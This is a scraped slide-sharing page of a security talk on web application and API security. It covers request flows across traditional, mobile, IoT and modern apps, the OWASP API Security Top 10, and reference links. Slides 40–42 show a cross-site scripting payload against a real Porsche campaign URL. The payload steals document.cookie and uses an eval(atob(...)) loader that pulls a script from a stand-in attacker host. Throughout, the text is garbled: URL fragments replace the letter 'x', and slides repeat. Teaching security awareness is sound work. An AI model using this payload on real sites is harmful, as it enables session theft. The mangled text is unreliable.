ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare

?
?
Paulo Silva
Paulo Silva

The document discusses the evolution of web applications from traditional to modern architectures. It e/slideshow/web-apps-apis-nightmare/262279758/xplains how traditional web apps involved separate files (HTML, CSS, JS) retrieved through individual HTTP requests, while modern apps retrieve all code in a single bundle and make additional requests to APIs. It also covers how mobile, IoT and other connected apps interact through APIs instead of web pages. Finally, it lists the OWASP API Security Top 10 risks and provides additional resources on secure API development.

1 of 48
www.char49.com TRUE SECURITY Web Apps: APIs¡¯ Nightmare
¡ñ Security Researcher/Pentester ¡ñ 15+ years as a Software Developer ¡ñ Long-term OWASP Volunteer ¡ñ Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs¡¯ Nightmare
source: https://home.cern/science/computing/birth-web
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php . . . ... GET /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php . . . ... GET /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . . POST /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs¡¯ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
Web Apps: APIs¡¯ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
Web Apps: APIs¡¯ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
Web Apps: APIs¡¯ Nightmare
Web Apps: APIs¡¯ Nightmare
Web Apps: APIs¡¯ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
Web Apps: APIs¡¯ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs¡¯ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
Web Apps: APIs¡¯ Nightmare Modern Web Applications Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ...
Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
Web Apps: APIs¡¯ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
API API API API API API API API API API API API API Web Apps: APIs¡¯ Nightmare API
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs¡¯ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAja/slideshow/web-apps-apis-nightmare/262279758/xGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=/slideshow/web-apps-apis-nightmare/262279758/x onerror=alert(document.cookie)>
Web Apps: APIs¡¯ Nightmare Loader Payload Cross-Site Scripting
Web Apps: APIs¡¯ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAja/slideshow/web-apps-apis-nightmare/262279758/xGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=/slideshow/web-apps-apis-nightmare/262279758/x onerror=eval(atob(¡°KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==¡±))> Payload Cross-Site Scripting
Web Apps: APIs¡¯ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare
Web Apps: APIs¡¯ Nightmare OWASP Resources Other References ¡ñ OWASP API Security Project ¡ñ OWASP API Security Top 10 2023 ¡ñ OWASP API Security Top 10 2019 ¡ñ Goats ¡ñ OWASP Vulnerable Web Applications Directory ¡ñ OWASP crAPI - Completely Ridiculous API ¡ñ OWASP Juice Shop ¡ñ OWASP Cheat Sheets Series ¡ñ Authentication Cheat Sheet ¡ñ Authorization Cheat Sheet ¡ñ GraphQL Cheat Sheet ¡ñ REST Security Cheat Sheet ¡ñ Web Service Security Cheat Sheet ¡ñ OWASP Secure Coding Practices-Quick Reference Guide ¡ñ OWASP Go Secure Coding Practices Guide ¡ñ HTTP ¡ñ Basic of HTTP - mdn web docs ¡ñ Cross-Origin Resource Sharing (CORS) - mdn web docs ¡ñ API Protocols ¡ñ REST ¡ñ Representational state transfer - Wikipedia ¡ñ Representational State Transfer (REST) - Fielding Dissertation ¡ñ RPC ¡ñ Remote procedure call - Wikipedia ¡ñ OpenRPC ¡ñ JSON-RPC ¡ñ XML-RPC ¡ñ gRPC ¡ñ GraphQL ¡ñ Introduction to GraphQL ¡ñ GraphQL blogposts Series - Checkmar/slideshow/web-apps-apis-nightmare/262279758/x ¡ñ Rate Limiting GraphQL APIs by Calculating Query Comple/slideshow/web-apps-apis-nightmare/262279758/xity - Shopify ¡ñ MindAPI ¡ñ MindAPI References
Web Apps: APIs¡¯ Nightmare OWASP Resources Other References
www.char49.com Thank You!

More Related Content

Web Apps: APIs&#/slideshow/web-apps-apis-nightmare/262279758/x27; Nightmare

  • 2. ¡ñ Security Researcher/Pentester ¡ñ 15+ years as a Software Developer ¡ñ Long-term OWASP Volunteer ¡ñ Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs¡¯ Nightmare
  • 7. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
  • 8. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
  • 9. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
  • 10. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
  • 11. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php . . . ... GET /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . .
  • 12. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php inde/slideshow/web-apps-apis-nightmare/262279758/x.php . . . ... GET /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html GET /style/display.css Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/css GET /scripts/main.js Content-Type: application/javascript php inde/slideshow/web-apps-apis-nightmare/262279758/x.php login.php . . . POST /login.php Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html
  • 14. Web Apps: APIs¡¯ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
  • 15. Web Apps: APIs¡¯ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
  • 16. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
  • 17. Web Apps: APIs¡¯ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
  • 18. Web Apps: APIs¡¯ Nightmare
  • 19. Web Apps: APIs¡¯ Nightmare
  • 20. Web Apps: APIs¡¯ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
  • 21. Web Apps: APIs¡¯ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
  • 22. Web Apps: APIs¡¯ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
  • 23. Web Apps: APIs¡¯ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
  • 24. Web Apps: APIs¡¯ Nightmare Modern Web Applications Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ...
  • 25. Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
  • 26. Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
  • 27. Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
  • 28. Web Apps: APIs¡¯ Nightmare Client Server GET / Content-Type: te/slideshow/web-apps-apis-nightmare/262279758/xt/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public inde/slideshow/web-apps-apis-nightmare/262279758/x.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
  • 29. Web Apps: APIs¡¯ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
  • 30. API API API API API API API API API API API API API Web Apps: APIs¡¯ Nightmare API
  • 40. Web Apps: APIs¡¯ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAja/slideshow/web-apps-apis-nightmare/262279758/xGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=/slideshow/web-apps-apis-nightmare/262279758/x onerror=alert(document.cookie)>
  • 41. Web Apps: APIs¡¯ Nightmare Loader Payload Cross-Site Scripting
  • 42. Web Apps: APIs¡¯ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAja/slideshow/web-apps-apis-nightmare/262279758/xGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=/slideshow/web-apps-apis-nightmare/262279758/x onerror=eval(atob(¡°KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==¡±))> Payload Cross-Site Scripting
  • 43. Web Apps: APIs¡¯ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
  • 46. Web Apps: APIs¡¯ Nightmare OWASP Resources Other References ¡ñ OWASP API Security Project ¡ñ OWASP API Security Top 10 2023 ¡ñ OWASP API Security Top 10 2019 ¡ñ Goats ¡ñ OWASP Vulnerable Web Applications Directory ¡ñ OWASP crAPI - Completely Ridiculous API ¡ñ OWASP Juice Shop ¡ñ OWASP Cheat Sheets Series ¡ñ Authentication Cheat Sheet ¡ñ Authorization Cheat Sheet ¡ñ GraphQL Cheat Sheet ¡ñ REST Security Cheat Sheet ¡ñ Web Service Security Cheat Sheet ¡ñ OWASP Secure Coding Practices-Quick Reference Guide ¡ñ OWASP Go Secure Coding Practices Guide ¡ñ HTTP ¡ñ Basic of HTTP - mdn web docs ¡ñ Cross-Origin Resource Sharing (CORS) - mdn web docs ¡ñ API Protocols ¡ñ REST ¡ñ Representational state transfer - Wikipedia ¡ñ Representational State Transfer (REST) - Fielding Dissertation ¡ñ RPC ¡ñ Remote procedure call - Wikipedia ¡ñ OpenRPC ¡ñ JSON-RPC ¡ñ XML-RPC ¡ñ gRPC ¡ñ GraphQL ¡ñ Introduction to GraphQL ¡ñ GraphQL blogposts Series - Checkmar/slideshow/web-apps-apis-nightmare/262279758/x ¡ñ Rate Limiting GraphQL APIs by Calculating Query Comple/slideshow/web-apps-apis-nightmare/262279758/xity - Shopify ¡ñ MindAPI ¡ñ MindAPI References
  • 47. Web Apps: APIs¡¯ Nightmare OWASP Resources Other References
AboutCopyright
? 2025 ºÝºÝߣ